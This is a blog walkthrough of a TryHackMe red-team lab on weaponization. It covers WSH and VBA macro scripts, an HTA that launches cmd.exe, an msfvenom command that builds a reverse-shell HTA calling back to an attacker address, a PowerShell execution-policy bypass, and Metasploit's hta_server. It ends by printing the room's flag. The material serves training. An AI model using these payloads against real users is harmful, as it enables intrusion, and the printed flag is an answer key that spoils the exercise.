Red Team: Initial Access – Weaponization | Try Hack Me

Hello world and welcome to HaXeZ, in this post I’m going to be going through the Weaponization room on TryHackMe. Until now, the rooms haven’t been that hands-on. However, this room steps it up a bit and has us create payloads for exploiting machines. Consequently, i’m going to try and reduce the reproduction of the content that THM has already created and focus on working through the solutions themselves.

Weaponization Cyber Kill Chain

The introduction to the room starts by explaining where weaponization falls within the cyber kill chain. Beneath, you can see from the image below, weaponization is the second stage. The image has been taken from TryHackMe.

Weaponization Cyber Kill Chain
Weaponization Cyber Kill Chain

Furthermore, the room explains that weaponization is the part of the engagement where the Red Teamer generates payloads to exploit the target. It then goes on to explain that some organizations block or monitor the execution of .exe files but that there are alternatives such as the ones listed below.

  • The Windows Script Host (WSH)
  • An HTML Application (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

Windows Scripting Host Weaponization

Windows Operating Systems have a built-in tool to run batch files called Windows Scripting Host. Furthermore, this scripting host tool allows for the execution of certain scripts. The room challenges us to write a script that creates a context box that says “Welcome to THM”. This can be achieved with the following code which can then be double-clicked or run from the command line.

Dim message 
message = "Welcome to THM"
MsgBox message

Next, the room challenges you to produce a script that can launch the calculator. This is fairly simple as it provides the script you need to run. However, it then asks you to produce a script to launch cmd.exe by telling you to replace calc.exe with cmd.exe. Although, it seems that this didn’t work for me. I did a bit of googling but didn’t find a solution.

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

HTML Application Weaponization

HTML Applications are insanely cool. They allow you to create a file and host them on a web server for an unsuspecting victim to click and run. Therefore, if an unsuspecting victim gives the application permission to run, it can grant the attacker access to their machine. For example, the snippet of code below can be hosted using the Python HTTP module and if run by a victim would open a command prompt.

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Moreover, you can use msfvenom to create reverse shell payload HTA applications. Similarly, this can also be hosted on a web server and if run by the victim would grant the attacker access to their machine. For example, the code below can be used to create an HTA application with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta

However, a far similar method of performing this type of attack is to the hta_server module in Metasploit. This module requires hardly any configuration and will automatically host the application for you. All the attacker would need to do is send the link to their victim and wait for them to run it.

Visual Basic for Application Weaponization

Visual Basic applications are another really cool way of delivering a payload. For example, Microsoft Office documents support macros which can be used to execute Visual Basic. Macros can be accessed by clicking View then macros. You then need to give the macro a name and the script to be executed. For example, the script below will run calc.exe.

Sub PoC()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub
Visual Basic for Application Weaponization
Visual Basic for Application Weaponization

There is a lot more to this section which you should definitely read through but this covers the basics. This is something I will definitely be adding to my list of exploits as it is very powerful if you can trick a user into running macros.

PowerShell Weaponization

PowerShell scripts are great for compromising machines. In fact, you can use PowerShell can execute a reverse shell directly or can download externally hosted payloads and execute that to create a reverse shell. However, one problem that we may face when executing PowerShell scripts is the execution policy. This can be overridden with the simple command below.

powershell -ex bypass -File thm.ps1

Command And Control – (C2 Or C&C)

This section of the room covers information about C2’s or Command and Control. However, we have covered these in more detail in the Intro to C2 room. It is good to read through this information to reinforce what was learned in the C2 room. There are no questions to answer here.

Red Team Part 5 – Intro to C2 | TryHackMe
Red Team Part 5 – Intro to C2 | TryHackMe

Delivery Techniques

This section of the room talks about the various delivery techniques used by threat actors. It’s fairly standard in that the usual suspects are present. It discusses email delivery, web delivery, and USB delivery. There is a great episode of Mr. Robot which demonstrates the effectiveness of USB delivery. Elliot drops a bunch of Rubber Duckys outside a police station. An officer picks up one of the USBs and plugs it into their computer. While the payload was caught by the antivirus, it does demonstrate how they can be used. If you’re looking for a way to make your own USB rubber ducky then check out my guide on how to use a Digispark.

Hack Any Computer In 2 Seconds With this £2 Device | Digispark
Hack Any Computer In 2 Seconds With this £2 Device | Digispark

Practice Arena

In order to complete the practice arena, I used the hta_server Metasploit module that was mentioned previously. Furthermore, It didn’t require any configuration, all it needed was the URL that Metasploit automatically generates. Next, you paste the URL into the web application and it downloads and executes the payload. The flag can be found below. I would however strongly encourage you to do this yourself rather than copying and pasting the answer.

THM{b4dbc2f16afdfe9579030a929b799719}